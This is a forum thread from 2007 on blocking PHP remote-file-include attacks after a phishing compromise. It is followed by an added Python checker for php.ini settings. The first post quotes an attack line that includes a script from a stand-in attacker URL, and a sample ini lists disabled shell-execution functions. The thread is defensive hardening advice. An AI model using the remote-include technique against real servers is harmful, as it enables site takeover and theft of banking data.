Avoiding remote PHP includes()

Discussion in 'General Discussion' started by Heritz, May 13, 2007.

  1. Heritz

    Hi all,

    Recently my company server has been attacked by phishers who are using a website vulnerability to upload files and get bank accounts information. We have been contacted by the bank and we fixed the problem within the website but I still got a question:

    The hack attempt was done using the remote include ability of PHP, I mean they exploited the include() function using something like include('http://myhackingwebsite.com/script.txt'); and then they uploaded the phishing files using system commands.

    I denied the system commands in my php.ini but I would also like to know how to avoid remote includes on PHP. I have enabled the open_basedir for all the sites, but as far as I know, open_basedir only affects file management functions, not includes.

    Any suggestion? Thanks in advance!
     
  2. Infopro

    mod_security?
     
  3. flash7

    php.ini

    ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
    allow_url_fopen = Off
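
An added example, not part of any post in this thread and not cPanel code: a small Python check that reads php.ini text and reports whether an include() of a URL would be fetched. It relies on documented PHP behaviour (before 5.2.0 allow_url_fopen alone governs URL includes; from 5.2.0 allow_url_include must also be On); the function names and both sample files are constructed for illustration.

```python
import re

# PHP's compiled-in defaults for the two directives that govern URL includes.
DEFAULTS = {"allow_url_fopen": "1", "allow_url_include": "0"}
ON_WORDS = {"1", "on", "yes", "true"}

def effective_settings(ini_text):
    """Parse php.ini text; the last occurrence of a directive wins."""
    settings = dict(DEFAULTS)
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()          # strip ';' comments
        m = re.match(r"([\w.]+)\s*=\s*(.*)$", line)
        if m and m.group(1).lower() in settings:
            settings[m.group(1).lower()] = m.group(2).strip().strip("\"'")
    return settings

def remote_include_possible(ini_text, php_version):
    """True if include('http://...') would be fetched under this php.ini."""
    s = {k: v.lower() in ON_WORDS for k, v in effective_settings(ini_text).items()}
    if php_version >= (5, 2):
        # 5.2.0+: needs allow_url_include AND allow_url_fopen both On.
        return s["allow_url_fopen"] and s["allow_url_include"]
    # Before 5.2.0 there is no allow_url_include; allow_url_fopen alone decides.
    return s["allow_url_fopen"]

# Constructed sample files (not taken from the thread's server).
STOCK_INI = """
; stock-style file that leaves URL wrappers enabled
allow_url_fopen = On
"""
HARDENED_INI = """
allow_url_fopen = On
disable_functions = system,exec,passthru,shell_exec
; setting from flash7's reply, placed later so it overrides the line above
allow_url_fopen = Off
"""

if __name__ == "__main__":
    for name, ini in (("stock", STOCK_INI), ("hardened", HARDENED_INI)):
        for ver in ((5, 1), (5, 2)):
            print(name, ver, remote_include_possible(ini, ver))
```

Run it against the php.ini that the web server's PHP actually loads; a duplicate directive further down the file silently overrides an earlier one, which is the case the hardened sample exercises.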
     